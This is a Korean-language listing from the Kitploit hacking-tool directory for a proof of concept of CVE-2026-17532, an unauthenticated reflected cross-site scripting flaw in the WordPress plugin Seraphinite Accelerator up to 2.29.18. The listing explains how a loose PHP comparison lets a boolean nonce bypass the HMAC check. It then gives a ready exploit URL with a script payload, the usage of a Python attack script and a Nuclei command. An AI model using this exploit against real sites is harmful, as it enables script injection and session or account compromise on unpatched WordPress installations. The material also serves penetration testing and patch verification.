Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-17532 — Seraphinite Accelerator <= 2.29.18 - 반사형 크로스 사이트 스크립팅 PoC | Kitploit
도구/GitHubGitHub/kalhoralireza/cve-2026-17532
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubkalhoralireza/cve-2026-17532

CVE-2026-17532

Seraphinite Accelerator <= 2.29.18 - 반사형 크로스 사이트 스크립팅 PoC

저장소 보기
215일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Seraphinite Accelerator <= 2.29.18 — 인증되지 않은 반사형 XSS

이 플러그인은 내부의 "prepare page" 요청을 seraph_accel_prep 매개변수(base64로 인코딩된 JSON)의 HMAC으로 서명하지만, 이를 PHP의 느슨한 != 연산자와 비교합니다. nonce로 JSON 불리언 true를 보내면 비교가 항상 통과하며, selfTest 필드는 이스케이프되지 않은 채 selfTest-<value>로 다시 에코됩니다.

단일 URL, 인증 불필요:

root@kitploit:~
http://TARGET/?seraph_accel_prep=<base64 of {"_tm":"1","nonce":true,"selfTest":"<script>alert(document.domain)</script>"}>

사용법

Python (pip install requests 필요):

root@kitploit:~
usage: seraph_accel_xss.py [-h] --url URL [--payload PAYLOAD] [--timeout TIMEOUT]

Seraphinite Accelerator (WordPress) <= 2.29.18

options:
  -h, --help         show this help message and exit
  --url URL          target site, e.g. http://target-site.com
  --payload PAYLOAD  XSS payload (default: <script>alert(document.domain)</script>)
  --timeout TIMEOUT  seconds (default: 30)

Nuclei:

root@kitploit:~
nuclei -u http://target-site.com -t seraphinite-accelerator-prep-xss.yaml -timeout 10

-timeout 10이 필요한 이유는 취약한 코드 경로가 응답하기 전에 5초 동안 대기(sleep)하기 때문입니다.

도구 다운로드